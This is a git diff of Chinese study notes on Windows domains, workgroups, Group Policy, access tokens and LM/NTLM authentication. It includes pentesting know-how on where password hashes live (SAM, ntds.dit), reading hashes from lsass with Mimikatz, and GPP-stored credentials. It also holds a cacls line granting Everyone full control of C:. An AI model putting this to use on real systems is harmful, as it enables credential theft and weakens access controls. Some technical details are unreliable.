+- Computers 容器 :Computers 容器是 Active Driectory 默认创建的第2个容器,用于存放 Windows Server 2008 域内所有成员计算机的计算机账号。
+- Domain Controllers 容器 :Domain Controllers 是一个特殊的容器,主要用于保存当前域控制器下创建的所有子域和辅助域。
+- Users 容器 :Users 容器主要用于保存安装 Active Driectory 时系统自动创建的用户和登录到当前域控制器的所有用户账户。
+
+**存储方式**
+
+- ntds.dit
+
+ ntds.dit 是 AD 中的数据库文件,它被保存在域控制器 `C:\Windows\NTDS\NTDS.dit` 位置。活动目录的数据库文件(ntds.dit)包含有关活动目录域中所有对象的所有信息,其中包含所有域用户和计算机帐户的密码哈希值。该文件在所有域控制器之间自动同步,它只能被域管理员访问和修改。
+
+ 该文件记录的信息有以下三张表:
+
+ - Schema 表 :这个表中包含了所有可在活动目录创建的对象信息以及他们之间的相互关系。包括各种类型对象的可选及不可选的各种属性。这个表是活动目录数据库中最小的一个表,但是也是最基础的一个表。
+ - Link 表 :Link 表包含所有属性的关联,包括活动目录中所有对象的属性的值。一个用户对象的所有属性的类型,包括每个属性的值及用户所属于的组等信息都属于这个表。这个表要大于 Schema 表,但与 Data 表相比要小。
+ - Data 表:活动目录中用户,组,应用程序特殊数据和其他的数据全部保存在 Data 表中。这是活动目录中存储信息最多的一个表,大量的活动目录的资料实际上还是存储在这个表中。
+
+- LDAP
+
+ ldap 是基于 tcp/ip 的轻量级目录访问协议,这种数据库文件后缀都为 `.ldif`,并使用特殊的节点查询语句来获取相应数据。和常规关系型数据库不同的是,ldap 并非按照常规的库、表、字段方式来存储数据,而是按照一种特殊的倒树状结构层级来组织管理数据,此处的树指的就是目录信息树,即 DIT。(目录信息树相当于专门用来进行读操作的数据库。)
+
+ 在目录信息树里创建一个条目(entry)时,条目的信息存储在属性(attribute)里,属性又被组合成对象类(objectClass),对象类进一步组成了架构(schema)
+
+ 在DIT内部则由N个条目entry所组成,就相当于常规数据库表中每条具体的记录,而条目的内容则是由具有唯一标识名 DN 的属性[Attribute]及属性对应的值[value]所组成的一个集合。
+
+ 条目为 ldap 中最基础的操作单位,通常对ldap的增、删、改、查都是以条目为基本单元进行的。
+
+ 本地打开 LDAP 编辑器。运行->打开 `adsiedit.msc`(只有域控居于整个域内的配置信息)
+
+**Ntdsutil.exe**
+
+`ntdsutil.exe` 是域控制器自带的域数据库管理工具,从 windows Server 2008 开始就默认自带了。因此我们可以通过 `ntdsutil.exe` 提取出域中所有的域用户信息。以下命令必须在域控上执行:
+
+---
+
+# DNS域名服务器
+
+域控服务器要求 DNS 服务器按名称查找计算机、成员服务器和网络服务。
+
+- 域名解析:DNS 服务器通过其A记录将域名解析成IP地址
+- 定位活动目录服务:客户机通过 DNS 服务器上的 SRV 服务记录定位提供某一个服务的计算机
+
+一般情况下,DNS 服务器和域控制器会处在同一台机器上。
+
+**SRV 服务记录**
+
+SRV 服务记录是 DNS 服务器的数据库中支持的一种资源记录的类型,它记录了哪台计算机提供了哪个服务这么一个简单的信息。
+
+一般是为活动目录 AD 设置的应用。DNS 可以独立于活动目录,但是活动目录必须有 DNS 的帮助才能工作。为了活动目录能够正常的工作,DNS 服务器必须支持服务定位 (SRV)资源记录,资源记录把服务名字映射为提供服务的服务器名字。域主机和域控制器使用 SRV 资源记录决定域控制器的 IP 地址和提供服务的服务器IP地址。
+
+---
+
+**Source & Reference**
+- [内网渗透 | 工作组和域的区别](https://mp.weixin.qq.com/s/5wgCGHrE5MNsKvN9rChBsw)
+- [域控理论知识](https://www.cnblogs.com/zoulongbin/p/6027362.html)
diff --git "a/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\267\245\344\275\234\347\273\204.md" "b/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\267\245\344\275\234\347\273\204.md"
new file mode 100644
index 00000000..d5f14eea
--- /dev/null
+++ "b/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\267\245\344\275\234\347\273\204.md"
@@ -0,0 +1,34 @@
+# 工作组
+
+---
+
+工作组是局域网中的一个概念,它是最常见的资源管理模式,简单是因为默认情况下计算机都是采用工作组方式进行资源管理的。将不同的电脑按功能分别列入不同的组中,以方便管理。默认情况下所有计算机都处在名为 WORKGROUP 的工作组中,工作组资源管理模式适合于网络中计算机不多,对管理要求不严格的情况。它的建立步骤简单,使用起来也很好上手。大部分中小公司都采取工作组的方式对资源进行权限分配和目录共享。相同组中的不同用户通过对方主机的用户名和密码可以查看对方共享的文件夹,默认共享的是 Users 目录。不同组的不同用户通过对方主机的用户名和密码也可以查看对方共享的文件夹。所以工作组并不存在真正的集中管理作用 , 工作组里的所有计算机都是对等的 , 也就是没有服务器和客户机之分的。
+
+**工作组的加入**
+
+右击桌面上的“计算机”,在弹出的菜单出选择“属性”,点击“高级系统设置”-->“计算机名”,点击“更改”在“计算机名”一栏中键入你想好的名称,在“工作组”一栏中键入你想加入的工作组名称。如果你输入的工作组名称网络中没有,那么相当于新建了一个工作组,当然暂时只有你的电脑在组内。单击“确定”按钮后,Windows 提示需要重新启动,重新启动之后,再进入“网络”就可以看到你所加入的工作组成员了
+
+![](../../../../assets/img/运维/Windows/笔记/工作组/1.png)
+
+**工作组的退出**
+
+只要将工作组名称改动即可。不过在网上别人照样可以访问你的共享资源。你也可以随便加入同一网络上的任何其它工作组。“工作组”就像一个可以自由进入和退出的“社团”,方便同一组的计算机互相访问。
+
+**工作组的访问**
+
+文件夹-->网络,就可以查看到我们工作组中的其他计算机了,当你要访问某台计算机时,点击它,然后输入该主机的用户名和密码即可看到该主机共享的文件夹。
+
+**工作组的优缺点**
+
+- 优点
+
+ 在一个网络内,可能有上百台电脑,如果这些电脑不进行分组,都列在“网上邻居”中,电脑无规则的排列为我们访问资源带来不方便。为了解决这一问题,Windows98操作系统之后就引用了“工作组”这个概念,将不同的电脑按功能分别列入不同的组中,如软件部的电脑都列入“软件部”工作组中,网络部的电脑都列入“网络部”工作组中。你要访问某个部门的资源,就在“网上邻居”里找到那个部门的工作组名,双击就可以看到那个部门的电脑了。计算机通过工作组进行分类,使得我们访问资源更加具有层次化。工作组情况下资源可以相当随机和灵活的分布,更方便资源共享,管理员只需要实施相当低级的维护。
+
+- 缺点
+
+ 缺乏集中管理与控制的机制,没有集中的统一帐户管理,没有对资源实施更加高效率的集中管理,没有实施工作站的有效配置和安全性严密控制。只适合小规模用户的使用。
+
+基于以上缺点,当计算机数量比较多,大型企业中网络规模大,需要统一的管理和集中的身份验证,并且能够给用户提供方便的搜索和使用网络资源的方式,工作组的组织形式就不合适了,于是域就出现了
+
+**Source & Reference**
+- [内网渗透 | 工作组和域的区别](https://mp.weixin.qq.com/s/5wgCGHrE5MNsKvN9rChBsw)
diff --git "a/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\346\227\245\345\277\227.md" "b/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\346\227\245\345\277\227.md"
index fb99f3a3..75c4016e 100644
--- "a/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\346\227\245\345\277\227.md"
+++ "b/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\346\227\245\345\277\227.md"
@@ -1,9 +1,11 @@
# 日志
-
+
+---
+
在 windows 系统的运行过程中会不断记录日志信息,根据种类可以分为windows日志(事件日志)、应用程序及服务日志,这些日志信息在取证和溯源中非常重要。
---
diff --git "a/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\347\273\204\347\255\226\347\225\245.md" "b/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\347\273\204\347\255\226\347\225\245.md"
new file mode 100644
index 00000000..d6d1cdc1
--- /dev/null
+++ "b/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\347\273\204\347\255\226\347\225\245.md"
@@ -0,0 +1,112 @@
+# 组策略
+
+---
+
+组策略(英语:Group Policy)是微软 Windows NT 家族操作系统的一个特性,它可以控制用户帐户和计算机帐户的工作环境。组策略提供了操作系统、应用程序和活动目录中用户设置的集中化管理和配置。组策略的其中一个版本名为本地组策略(缩写“LGPO”或“LocalGPO”),这可以在独立且非域的计算机上管理组策略对象。
+
+通过使用组策略,你可以设置策略设置一次,然后将该设置复制到多台计算机上。 例如,你可以在链接到域的 GPO 中设置多个 Internet Explorer11 安全设置,然后将所有这些设置应用到域中的每台计算机。
+
+根据作用范围不同组策略可划分为多种,并且拥有自己的执行顺序和继承原则。
+
+---
+
+# 本地组策略
+
+## LGP
+
+Local Group Policy,缩写 LGP 或 LocalGPO 是组策略的基础版本,它面向独立且非域的计算机。至少 Windows XP 家庭版中它就已经存在,并且可以应用到域计算机。在 Windows Vista 以前,LGP 可以强制施行组策略对象到单台本地计算机,但不能将策略应用到用户或组。从 Windows Vista 开始,LGP 允许本地组策略管理单个用户和组,并允许使用“GPO Packs”在独立计算机之间备份、导入和导出组策略——组策略容器包含导入策略到目标计算机的所需文件。
+
+# 域策略
+
+当机器安装了域环境的时候,系统管理工具会多出一个功能(组策略管理),通过它,域管理员能够很方便统一地对域内的机器和用户进行统一管理。
+
+域管理员经常会面对一个这样的问题,域成员机子的默认本地管理员密码过于简单,想进行批量修改的时候,这个时候就可以利用组策略来进行任务的批量下发。
+
+1.通过在域中下发脚本来执行
+2.在组策略首选项 GPP 中进行设置
+3.本地管理员密码解决方案:LAPS(不细说这个内容,这是解决这个问题很好的方案)
+
+首先我们需要了解下 AD 域中两个默认的共享文件夹: SYSVOL NETLOGON
+
+可以用 net share 查看共享文件夹
+
+## NETLOGON
+
+NETLOGON 共享是 SYSVOL 目录中一个文件夹 Scripts 的共享名,顾名思义就是用来保存脚本信息的,是 AD 活动目录安装时候自动创建的。
+
+挂载点: `SYSVOL\domain\SCRIPTS`
+
+---
+
+## SYSVOL
+
+每台 Windows 主机有一个内置的 Administrator 账户以及相关联的密码。大多数组织机构为了安全,可能都会要求更改密码,虽然这种方法的效果并不尽如人意。标准的做法是利用组策略去批量设置工作站的本地 Administrator 密码。但是这样又会出现另一个问题,那就是所有的电脑都会有相同的本地 Administrator 密码。也就是说,如果获取了一个系统的 Administrator 认证凭据,黑客就可以获取他们所有机器的管理权限。
+
+解决办法之一是为认证数据采取 SYSVOL,SYSVOL 是 AD(活动目录)里面一个存储域公共文件服务器副本的共享文件夹,所有的认证用户都可以读取。SYSVOL 包括登录脚本,组策略数据,以及其他域控所需要的域数据,这是因为 SYSVOL 能在所有域控里进行自动同步和共享。
+
+SYSVOL 在域中所有的域控制器之间复制。 Sysvol 文件夹是安装 AD 时创建的,它用来存放 GPO、Script 等信息。同时,存放在 Sysvol 文件夹中的信息,会复制到域中所有 DC 上。
+
+所有的域组策略存储在: `\\\SYSVOL\\Policies\`
+
+在域中,用户登录(计算机)时,会首先在 SYSVOL 文件查找 GPO 和启动脚本。同时,为了保证系统的正常运行,必须为 SYSVOL 保留足够的空间缓存,而且不能随意删除、改动该文件夹,要不然会出现一些组策略无法启用等报错信息。
+
+该目录由于针对的是域内所有机器和用户,所以域内中的合法用户均可以访问和执行该目录的文件。(普通的域用户也可以)
+
+---
+
+## GPO
+
+组策略对象,GPO(Group Policy Object),实际上就是组策略设置的集合。你可以用 GPO 来存储不同的组策略信息,然后作用在指定 OU 或者指定作用范围发挥作用。
+
+默认安装完 AD 之后,系统默认会存在两个组策略对象
+
+**Default Domain Policy**
+
+默认域策略
+
+Windows Server 2008 为林中的每个域创建一个默认域策略 GPO。这个域是用于设置一些安全相关策略的主要方法,如密码过期和账户锁定等。
+
+存放的路径: `C:\Windows\SYSVOL\sysvol\test1.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}`
+
+唯一ID(GUID):{31B2F340-016D-11D2-945F-00C04FB984F9} (都是相同的)
+
+![](../../../../assets/img/运维/Windows/笔记/组策略/1.png)
+
+**Default Domain Controllers Policy**
+
+默认域控制器策略
+
+管理目标“Domain Controllers”容器,影响“Domain Controllers”容器中的域控制器,域控制器账户单独保存在该容器中。
+
+唯一ID(GUID):{6AC1786C-016F-11D2-945F-00C04FB984F9} (都是相同的)
+
+![](../../../../assets/img/运维/Windows/笔记/组策略/2.png)
+
+---
+
+## GPP
+
+在2006年,微软收购了桌面标准的“PolicyMaker”,并重新借此与 win2008 发布了 GPP(组策略首选项)用来完成很多组策略无法进行的系统及用用配置。其中 GPP 最有用的特性,是在某些场景存储和使用凭据,其中包括:
+```
+映射驱动(Drives.xml)
+创建本地用户
+数据源(DataSources.xml)
+打印机配置(Printers.xml)
+创建/更新服务(Services.xml)
+计划任务(ScheduledTasks.xml)
+更改本地 Administrator 密码
+```
+这对管理员非常有用,因为 GPP 提供了一个自动化机制,可以作为急需的解决方案(比如脚本)给他们。它提供了有效的方法,利用显式凭据结合组策略部署了计划任务,一次性批量更改了电脑的本地管理的密码。
+
+组策略首选项借助了组策略对象(Group Policy Oject, GPO) 实现了对域中所有资源的管理。
+
+![](../../../../assets/img/运维/Windows/笔记/组策略/3.png)
+
+![](../../../../assets/img/运维/Windows/笔记/组策略/4.png)
+
+GPP 里面自定义了很多操作,比如本地用户和组的密码控制、计划任务等
+
+---
+
+**Source & Reference**
+- [浅析域渗透中的组策略利用](https://xz.aliyun.com/t/7784)
diff --git "a/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\247\222\350\211\262\346\235\203\351\231\220.md" "b/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\247\222\350\211\262\346\235\203\351\231\220.md"
index b24a68f2..b90f9cff 100644
--- "a/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\247\222\350\211\262\346\235\203\351\231\220.md"
+++ "b/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\247\222\350\211\262\346\235\203\351\231\220.md"
@@ -2,7 +2,7 @@
---
-在 Windows vista或是windows 7中,有两个级别的用户:标准用户和管理员.
+在 Windows vista 或是 windows 7中,有两个级别的用户:标准用户和管理员.
- 标准用户是计算机 Users 组的成员;
- 管理员是计算机 Administrators 组的成员.
@@ -18,3 +18,47 @@
cacls c: /T /P Everyone:F 对C盘所有目录进行降权
```
+
+---
+
+# Windows Access Token
+
+Windows Token 其实叫 Access Token(访问令牌),它是一个描述进程或者线程安全上下文的一个对象。不同的用户登录计算机后, 都会生成一个 Access Token,这个 Token 在用户创建进程或者线程时会被使用,不断的拷贝,这也就解释了 A 用户创建一个进程而该 进程没有 B 用户的权限。
+
+Access Token 种类:
+- 主令牌
+- 模拟令牌
+
+一般情况下,用户双击运行一个程序,都会拷贝 “explorer.exe” 的 Access Token。
+
+当用户注销后,系统将会使主令牌切换为模拟令牌,不会将令牌清除,只有在重启机器后才会清除。
+
+**Windows Access Token 组成**
+- 用户帐户的安全标识符(SID)
+- 用户所属的组的 SID
+- 用于标识当前登录会话的登录 SID
+- 用户或用户组所拥有的权限列表
+- 所有者 SID
+- 主要组的 SID
+- 访问控制列表
+- 访问令牌的来源
+- 令牌是主要令牌还是模拟令牌
+- 限制 SID 的可选列表
+- 目前的模拟等级
+- 其他统计数据
+
+**SID 安全标识符**
+
+安全标识符是一个唯一的字符串,它可以代表一个账户、一个用户 组、或者是一次登录。通常它还有一个 SID 固定列表,例如 Everyone 这种已经内置的账户,默认拥有固定的 SID。
+
+SID 的表现形式:
+- 域 SID-用户 ID
+- 计算机 SID-用户 ID
+- SID 列表都会存储在域控的 AD 或者计算机本地账户数据库中。
+
+**Windows Access Token 产生过程**
+
+每个进程创建时都会根据登录会话权限由 LSA(Local Security Authority)分配一个 Token(如果 CreaetProcess 时自己指定了 Token, LSA 会用该 Token, 否则就用父进程 Token 的一份拷贝。
+
+**Source & Reference**
+- [彻底理解Windows认证 - 议题解读](https://payloads.online/archivers/2018-11-30/1)
diff --git "a/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201.md" "b/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201.md"
index 16f0fad1..13ee803a 100644
--- "a/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201.md"
+++ "b/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\350\256\244\350\257\201.md"
@@ -1,50 +1,134 @@
# 认证
+> 注 : 笔记中拓扑图 drawio 与 xmind 源文件在其图片目录下
+
---
-# 本地认证
+
+
+
+
+---
-在 Windows 系统中本机用户的密码 Hash 是放在本地的 `SAM` 文件里面,域内用户的密码 Hash 是存在域控的 `NTDS.DIT` 文件里面。
+# 大纲
+
+* **[本地认证](#本地认证)**
+ * [LM-Hash](#lm-hash)
+ * [NTLM-Hash](#ntlm-hash)
+ * [本地认证流程](#本地认证流程)
+
+* **[网络认证](#网络认证)**
+ * [LM](#lm)
+ * [NTLM](#ntlm)
+ * [Challenge/Response](#challengeresponse)
+ * [NTLMv2](#ntlmv2)
+ * [Net-NTLM hash](#net-ntlm-hash)
+ * [域环境中NTLM认证方式](#域环境中ntlm认证方式)
+ * [SSP & SSPI](#ssp--sspi)
+
+* **[域认证](#域认证)**
+ * [Kerberos](#kerberos)
+ * [简要概括认证过程](#简要概括认证过程)
+ * [详细概括认证过程](#详细概括认证过程)
+ * [PAC](#pac)
+ * [SPN](#spn)
+ * [委派](#委派)
+ * [约束委派](#约束委派)
+ * [基于资源的约束委派](#基于资源的约束委派)
-sam 的简称是Security Account Manager,安全账户管理器。
+---
-Windows XP、Windows Vista、Windows 7、Win 8.1 Win 10 的用户密码以 hash 形式存储在 `%SystemRoot%\system32\config\sam` 数据库文件中。被保存的 hash 分为 `LM Hash` 和 `NTLM hash`;微软在 Windows NT 4.0 中引入 SYSKEY 对 `SAM` 文件加密。
+# 本地认证
-所谓哈希(hash),就是使用一种加密函数进行计算后的结果。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。现在已经有了更新的 NTLMv2 以及 Kerberos 验证体系。Windows 加密过的密码口令,我们称之为 hash,Windows 的系统密码 hash 默认情况下一般由两部分组成:第一部分是 LM-hash,第二部分是 NTLM-hash。
+在 Windows 系统中本机的用户密码以 hash 形式存储在 `%SystemRoot%\system32\config\sam` 数据库文件中。sam 的简称是Security Account Manager,安全账户管理器。被保存的 hash 分为 `LM Hash` 和 `NTLM hash`;微软在 Windows NT 4.0 中引入 SYSKEY 对 `SAM` 文件加密。而域内用户的密码 Hash 是存在域控的 `NTDS.DIT` 文件里面。
-登录系统的时候,系统会自动地读取 `SAM` 文件中的密码与键入的密码进行比对,如果相同,则认证成功。
+这个 SAM 文件中保留了计算机本地所有用户的凭证信息,可以理解为是一个数据库。登录系统的时候,系统会自动地读取 `SAM` 文件中的密码与键入的密码进行比对,如果相同,则认证成功。
操作系统启动之后,`SAM` 文件将同时被锁定。这意味着操作系统运行之时,用户无法打开或复制 `SAM` 文件。除了锁定,整个 `SAM` 文件还经过加密,且不可见。
-**LM Hash**
+**哈希(hash)**
+
+Windows 本身不保存明文密码,只保留密码的 Hash。为了保证存储的不是明文,从而采用 Hash,但是密码 Hash 也需要特定的生成算法以及表现形式。
+
+Hash 就是使用一种加密函数进行计算后的结果。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。现在已经有了更新的 NTLMv2 以及 Kerberos 验证体系。Windows 加密过的密码口令,我们称之为 hash,Windows 的系统密码 hash 默认情况下一般由两部分组成:第一部分是 LM-hash,第二部分是 NTLM-hash。
+
+---
+
+## LM-Hash
+
+LAN Manager(LM)哈希是 Windows 系统所用的第一种密码哈希算法,是一种较古老的 Hash,在 LAN Manager 协议中使用,非常容易通过暴力破解获取明文凭据。它只有唯一一个版本且一直用到了 NT LAN Manager(NTLM)哈希的出现,在 Windows Vista/Windows 7/Windows Server 2008 以及后面的系统中,LM 哈希算法是默认关闭的,LM 算法是在 DES 基础上实现的,不区分字母大小写,由 IBM 设计。
-LAN Manager(LM)哈希是 Windows 系统所用的第一种密码哈希算法,是一种较古老的 Hash,在 LAN Manager 协议中使用,非常容易通过暴力破解获取明文凭据。它只有唯一一个版本且一直用到了 NT LAN Manager(NTLM)哈希的出现,在 Windows Vista/Windows 7/Windows Server 2008 以及后面的系统中,LM 哈希算法是默认关闭的,LM 算法是在 DES 基础上实现的,不区分字母大小写。
-- 生成原理
- 1. 用户的密码转换为大写,密码转换为16进制字符串,不足14字节将会用0来再后面补全。
- 2. 密码的16进制字符串被分成两个 7byte 部分。每部分转换成比特流,并且长度位 56bit,长度不足用0在左边补齐长度
- 3. 再分 7bit 为一组,每组末尾加 0,再组成一组
- 4. 上步骤得到的二组,分别作为 key 为 `KGS!@#$%` 进行 DES 加密。
- 4. 将加密后的两组拼接在一起,得到最终 LM HASH 值。
+**生成原理**
+1. 用户的密码转换为大写,密码转换为16进制字符串,不足14字节将会用0来再后面补全。
+2. 密码的16进制字符串被分成两个 7byte 部分。每部分转换成比特流,并且长度位 56bit,长度不足用0在左边补齐长度
+3. 再分 7bit 为一组,每组末尾加 0,再组成一组
+4. 上步骤得到的二组,分别作为 key 为 `KGS!@#$%` 进行 DES 加密。
+4. 将加密后的两组拼接在一起,得到最终 LM HASH 值。
+
+**风险**
+
+LM 加密算法存在一些固有的漏洞
+1. 首先,密码长度最大只能为14个字符
+2. 密码不区分大小写。在生成哈希值之前,所有密码都将转换为大写
+3. 查看我们的加密过程,就可以看到使用的是分组的 DES,如果密码强度是小于 7 位,那么第二个分组加密后的结果肯定是 aad3b435b51404ee,同理,如果我们看到 lm hash 的结尾是 aad3b435b51404ee,就可以判断密码强度少于7位
+4. 一个14个字符的密码分成7 + 7个字符,并且分别为这两个半部分计算哈希值。这种计算哈希值的方式使破解难度成倍增加,因为攻击者需要将7个字符(而不是14个字符)强制暴力破解。这使得14个字符的密码的有效强度等于,或者是7个字符的密码的两倍,该密码的复杂度明显低于 9514 14个字符的密码的理论强度。
+5. Des 密码强度不高
+
+---
+
+## NTLM-Hash
**NTLM Hash**
+为了解决 LM 加密和身份验证方案中固有的安全弱点,Microsoft 于 1993 年在 Windows NT 3.1 中引入了 NTLM 协议。
+
NT LAN Manager(NTLM)哈希是 Windows 系统认可的另一种算法,用于替代古老的 LM-Hash,一般指 Windows 系统下 Security Account Manager(SAM)中保存的用户密码 hash,在 Windows Vista/Windows 7/Windows Server 2008 以及后面的系统中,NTLM 哈希算法是默认启用的。
+下面是各个版本对 LM 和 NTLM 的支持。
+
+| | 2000 | XP | 2003 | Vista | Win7 | 2008 | Win8 | 2012 |
+| - | - | - | - | - | - | - | - | - |
+| LM | ✔ | ✔ | ✔ | | | | | |
+| NTLM | 🔺 | 🔺 | 🔺 | ✔ | ✔ | ✔ | ✔ | ✔ |
+
+---
+
+| ✔ | 系统默认使用的加密方式 |
+| - | - |
+| 🔺 | 当密码超过14位时使用的加密方式 |
+
当用户登录时,将用户输入的明文密码加密成 `NTLM Hash`,与 `SAM` 数据库文件中的 `NTLM Hash` 进行比较。
在渗透测试中,通常可从 Windows 系统中的 `SAM` 文件和域控的 `NTDS.dit` 文件中获得所有用户的 hash,通过 Mimikatz 读取 `lsass.exe` 进程能获得已登录用户的 `NTLM hash`。
-- 生成原理
- 1. 先将用户密码转换为十六进制格式。
- 2. 将十六进制格式的密码进行 Unicode 编码。
- 3. 使用 MD4 摘要算法对 Unicode 编码数据进行 Hash 计算
+**生成原理**
+1. 先将用户密码转换为十六进制格式。
+2. 将十六进制格式的密码进行 Unicode 编码。
+3. 使用 MD4 摘要算法对 Unicode 编码数据进行 Hash 计算
-- 快速生成
- ```bash
- python2 -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "P@ssw0rd".encode("utf-16le")).digest())'
- ```
+**快速生成**
+```bash
+python2 -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "P@ssw0rd".encode("utf-16le")).digest())'
+```
+
+**NTLM Hash 与 NTLM 的关系**
+
+在 Windows 中,密码 Hash 目前称之为 NTLM Hash,其中 NTLM 全称是:“NT LAN Manager”。
+
+而 NTLM 是一种网络认证协议,与 NTLM Hash 的关系就是:NTLM 网络认证协议是以 NTLM Hash 作为根本凭证进行认证的协议。也就是说,NTLM 与 NTLM Hash 相互对应。
+
+在本地认证的过程中,其实就是将用户输入的密码转换为 NTLM Hash 与 SAM 中的 NTLM Hash 进行比较。
-**本地认证流程**
+---
+
+## 本地认证流程
+
+本地登录时,用户的密码存储在 `%SystemRoot%\system32\config\SAM` 这个文件里。当用户输入密码进行本地认证的过程中,所有的操作都是在本地进行的。他其实就是将用户输入的密码转换为 NTLM Hash,然后与 SAM 中的 NTLM Hash 进行比较。当用户注销、重启、锁屏后,操作系统会让 winlogon 显示登录界面,也就是输入框。当 winlogon.exe 接收输入后,将密码交给 lsass 进程,这个进程中会存一份明文密码,将明文密码加密成 NTLM Hash,对 SAM 数据库比较认证。
+
+- Windows Logon Process(即 winlogon.exe),是Windows NT 用户登陆程序,用于管理用户登录和退出。
+- LSASS 用于微软 Windows 系统的安全机制。用于本地安全和登陆策略。
+
+**参考如下**
```bash
winlogon.exe -> 接收用户输入 -> lsass.exe -> 认证
@@ -53,12 +137,9 @@ winlogon.exe -> 接收用户输入 -> lsass.exe -> 认证
1. 当刚开机、注销等操作后,winlogon.exe 进程会显示一个登录界面要求输入用户名和密码。
2. 输入用户名和密码后,会被 winlogon.exe 获取,然后将其发送给 lsass.exe 进程。
3. lsass.exe 将明文密码计算得到 NT Hash(不考虑LM)。
-4. 之后会将用户名和计算得到的 NT Hash 拿到 SAM 数据库去查找比对。
-
-![](../../../../assets/img/运维/Windows/笔记/认证/1.png)
+4. 之后会将用户名和密码计算得到的 NT Hash 拿到 SAM 数据库去查找比对。
-- Windows Logon Process(即 winlogon.exe),是Windows NT 用户登陆程序,用于管理用户登录和退出。
-- LSASS 用于微软 Windows 系统的安全机制。用于本地安全和登陆策略。
+ ![](../../../../assets/img/运维/Windows/笔记/认证/1.png)
---
@@ -72,81 +153,264 @@ winlogon.exe -> 接收用户输入 -> lsass.exe -> 认证
早期 SMB 协议在网络上传输明文口令。后来出现 LAN Manager Challenge/Response 验证机制,简称 LM,它很容易被破解,就又有了 NTLM 以及 Kerberos。
-**Net-NTLM hash**
+---
+
+## LM
+
+LM 与 NTLM 协议的认证机制相同,但是加密算法不同。
+
+目前大多数的 Windows 都采用 NTLM 协议认证,LM 协议已经基本淘汰了。
+
+---
+
+## NTLM
-NTLM 是一种网络认证协议,以 NTLM Hash 作为凭证进行认证。NTLM Hash 长度为32位,由数字和字母组成,采用挑战/响应(Challenge/Response)的消息交换模式,流程如下:
+**认证的应用**
-1. 客户端向服务器发送一个请求,请求中包含明文的登录用户名。服务器会提前存储登录用户名和对应的密码 hash
-2. 服务器接收到请求后,生成一个16位的随机数(这个随机数被称为 Challenge),明文发送回客户端。使用存储登录用户密码 hash 加密 Challenge,获得 Challenge1
-3. 客户端接收到 Challenge 后,使用登录用户的密码 hash 对 Challenge 加密,获得 Challenge2(这个结果被称 response),将 response 发送给服务器
-4. 服务器接收客户端加密后的 response,比较 Challenge1 和 response,如果相同,验证成功
+在域环境下,可以使用 Kerberos 或者 NTLM 认证来实现对用户的身份认证。在很多企业的内部网络中(基本都是域环境),都是使用 Kerberos认证或 NTLM 认证,在 Windows 2000 以后,在域环境下,Kerberos 是默认的认证方式。因为由于 NTLM 认证存在安全风险,所以用 Kerberos 认证的较多。Kerberos 较之 NTLM 更高效、更安全,同时认证过程也相对复杂。在非域环境下,一般都是使用 NTLM 进行认证。SMB 服务和很多 Web 程序都是使用 NTLM 来实现对用户的身份认证。
+
+**什么是 NTLM**
+
+NTLM 是一种网络认证协议,以 NTLM Hash 作为凭证进行认证。NTLM Hash 长度为32位,由数字和字母组成,采用挑战/响应(Challenge/Response)的消息交换模式,
+
+这个协议只支持 Windows.
+
+NTLM 协议的认证过程分为三步:
+- 协商 : 主要用于确认双方协议版本
+- 质询 : 就是挑战(Challenge)/响应(Response)认证机制起作用的范畴
+- 验证 : 验证主要是在质询完成后,验证结果,是认证的最后一步。
+
+### Challenge/Response
+
+1. 客户端需要访问服务器的某个服务(前提是他得知道服务器的用户名和密码),所以得进行身份认证。于是,客户端输入服务器的用户名和密码进行验证,客户端会缓存服务器密码的 NTLM-Hash 值。客户端发送 TYPE 1 Negotiate 协商消息去协商需要认证的主体,用户(服务器端的用户名),机器以及需要使用的安全服务等等信息。
+2. 服务端接收到客户端发送过来的 TYPE 1 消息,会读取其中的内容,并从中选择出自己所能接受的服务内容,加密等级,安全服务等等。然后传入 NTLM SSP,得到 NTLM_CHALLENGE 消息(被称为 TYPE 2 消息,Challenge 挑战消息),并将此 TYPE 2 消息发回给客户端。此TYPE 2消息中包含了一个由服务端生成的 16 位随机值,此随机值被称为 Challenge,服务器将该 Challenge 保存起来。
+3. 客户端收到服务端返回的 TYPE 2 消息, 读取出服务端所支持的内容,并取出其中的随机值 Challenge,用缓存的服务器端密码的哈希值 NTLM-Hash 对其进行加密,得到 Net NTLM-Hash(加密后的 Challenge),并且将 Net NTLM-Hash 封装到 NTLM_AUTH 消息中(被称为 TYPE 3 消息, Authenticate 认证消息),发往服务端。
+4. 服务器在收到 Type3 的消息之后,用自己的密码的 NTLM-Hash 对 Challenge 进行加密,并比较自己计算出的 Net NTLM-Hash 认证消息和客户端发送的认证消息是否匹配。如果匹配,则证明客户端掌握了正确的密码,认证成功,否则认证失败。
+
+ ![](../../../../assets/img/运维/Windows/笔记/认证/20.png)
+
+**详细过程**
+
+- type 1 协商
+
+ 这个过程是客户端向服务器发送 type 1(协商)消息,它主要包含客户端支持和服务器请求的功能列表。
+
+ 主要包含以下结构
+
+ ![](../../../../assets/img/运维/Windows/笔记/认证/26.png)
